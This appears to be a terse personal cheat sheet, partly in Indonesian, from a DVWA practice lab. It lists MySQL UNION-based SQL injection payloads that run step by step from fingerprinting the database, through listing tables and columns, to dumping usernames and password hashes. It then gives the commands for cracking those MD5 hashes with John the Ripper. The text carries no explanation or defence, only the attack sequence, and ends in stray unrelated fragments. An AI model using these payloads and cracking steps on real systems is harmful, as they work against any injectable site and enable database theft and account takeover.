SQL Injection

single input :

%' or '0'='0
%' or 0=0 union select null, version() #
%' or 0=0 union select null, user() #
%' or 0=0 union select null, database() #
%' and 1=0 union select null, table_name from information_schema.tables #
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</code></pre>

dapet user & pass :
buat file yg isinya :

user:pass

misal save di

/pentest/passwords/john
nama : dvwa_password.txt

lalu

cd /pentest/passwords/john
./john --format=raw-MD5 dvwa_password.txt
date
echo "Your Name"

Wetofu

SQL Injection